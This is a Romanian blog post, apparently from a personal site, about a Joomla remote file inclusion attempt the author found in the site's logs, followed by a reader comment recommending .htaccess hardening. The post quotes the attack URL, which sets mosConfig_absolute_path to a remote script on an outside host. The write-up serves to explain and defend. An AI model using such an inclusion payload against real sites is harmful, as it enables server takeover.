Am fost atacat (hack)!
Bine, nu e doar meritul meu, ci si al celor de la hosting.
Ce s-a intamplat… M-am uitat pe log-ul site-ului. Si vad urmatoarea chestie:
Click pe imagine pentru a mari!
Adica cineva a spus ca pagina mea trebuie sa contina si fisierul http://robintel.ro/index.php/?mosConfig_absolute_path=
http://222.122.158.XXX/bbs1/skin/log/test.txt? ceea ce este fals. NU este voie sa dai mosConfig_absolute_path, si, cu atat mai mult, pe URL-ul: http://222.122.158.XXX/bbs1/skin/log/test.txt. Deci, un „code injection”. Practic fisierul TXT este un script are s-ar fi vrut executat pentru a modifica setarile serverului, cu toate site-urile host-ate pe el. Da, evident ca l-am salvat. Nu, evident ca nu-l public!
Acum mai fac un backup, ca sa le compar. Si da, mai verific si fisierele. Mda, spor la treaba mie si noapte buna/ buna dimineata!
Prima oara cand am intrat mi s-a parut ciudata forma site-ului, m-am gandit ca e un template wordpress modificat. Dupa ce am citit articolul mi-am dat seama ca e ceva in neregula, pentru ca imi erau cunoscute liniile de cod. Apoi mi-am dat seama ca este vorba despre Joomla ( si apoi ca sa confirm m-am uita si prin codul sursa, desi era clar scris in footer…o sa fiu mai atent de acum ).
Ideea e ca nu prea au ce sa iti faca asa. Cei de la hosting ar trebui sa fie pregatiti, iar tu daca nu mai ai de facut alte chestioare ( instalat componente sau mai stiu eu ) seteaza .htaccess.
Ca securitate mi se pare mai bun WordPress, dar deh, uneori situatia cere altceva